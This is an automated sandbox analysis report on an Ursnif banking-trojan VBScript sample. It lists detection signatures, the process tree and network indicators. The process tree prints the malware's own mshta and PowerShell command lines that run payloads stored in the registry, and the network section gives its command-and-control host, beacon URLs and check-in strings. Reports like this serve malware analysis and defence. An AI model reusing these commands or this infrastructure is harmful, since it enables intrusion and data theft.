Loading ...

Play interactive tourEdit tour

Analysis Report my_presentation_96642.vbs

Overview

General Information

Sample Name:my_presentation_96642.vbs
Analysis ID:286676
MD5:2e44ef40fba0da489e9c15ff7c64692c
SHA1:2b28439329860c37a6f73e9560c717e4f3962a4f
SHA256:bfd79682733c250d046f4174c4b5eb8df75f1132d7e6ac2aa0b5c4ad95419ab6

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6884 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6052 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1220 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6596 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5408 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6868 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5940 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6804 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4108 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6584 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • control.exe (PID: 3596 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 12 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', ProcessId: 6804
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5940
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', ProcessId: 6804

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: my_presentation_96642.vbsVirustotal: Detection: 14%Perma Link
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1LY6s1oCH/O6I0fMOtxB_2FaMK/P_2FmFM_2F8ypR7/dx9hXoLcsTTkQCtqPt/jQT_2FP3D/Vu_2Br5n_2F72Y040sm_/2BshdGM4o4B1uUiNO_2/F9Br33BkXML4fx8yq9Jct6/kljeBXeVRXyBC/jH9YPFqS/oW_2BnptlSOO3fjce7eFLQs/cjY_2B3b6K/0jP5qluzKD5UfBlPH/Yyy63TkrNQlk/H6h_0A_0DaA/_2FxxiWhza0HQw/PJfj9KaKc_2Fqn7RK3nQF/t9F36pLVv5/WExF HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5Ci1Fp/NLUjkZDJX0Lhz0/_2B3Sl0fwWX3wVqK9fb0z/7prGaa1jNih_2FOl/e3_2BA_2FKyguNE/6gpQxTR29SWNVBzUiX/ooUjtYHSM/WJ2P7LXY0oqriYCDuUO5/6JGdRDFUFc7agHutM4Y/a7EEiaV_2B0Drpu7We2Elq/RNdw4UnphUm43/8yKUJrxx/MzdqD4aHhzJD6hXinP_2B_2/F_0A_0D_2F/yCrsh4eR2L6X7FBWv/KfYirZe4p8lP/b6dEfEFP0Hl/t0eFrlqKA0UbT2/NIFmqja4/0WX_2BS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EFIKznixG/GIj81mj5k3B7TX2D/fTUrCzDV3sDdRNL/bMPSf9FVeacVj6Vh6g/21pfsCJp2/EOpd_2B8C24lKh5Q2hDj/jl4XV9jmwt81YjEedHm/Tvg4EvsmItvP2bpxHHYerN/GLMMgTJoYNBZD/lWpad5rU/ln_2FWDRI9hu_2B3EPbvwjD/xVOTspfDX3/s2TnvfY8e1XD_0A_0/D9Osa1XJDU3_/2BhSFJPYg7H/ypXm94knvghV5F/1R2_2FzWrhbikgq4I9drg/0B61m_2Bo/Km_2FnHXX/v HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 16 Sep 2020 21:30:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6x
            Source: {4B9FB8EA-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFED50CD2992DAC186.TMP.19.drString found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EF
            Source: {4B9FB8E8-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFEC43E79FA2AE0F5E.TMP.19.drString found in binary or memory: http://api10.laptok.at/api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5
            Source: {4B9FB8E6-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFFF962DDB9C468E8F.TMP.19.drString found in binary or memory: http://api10.laptok.at/api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1L
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.662624699.000000000E2C2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
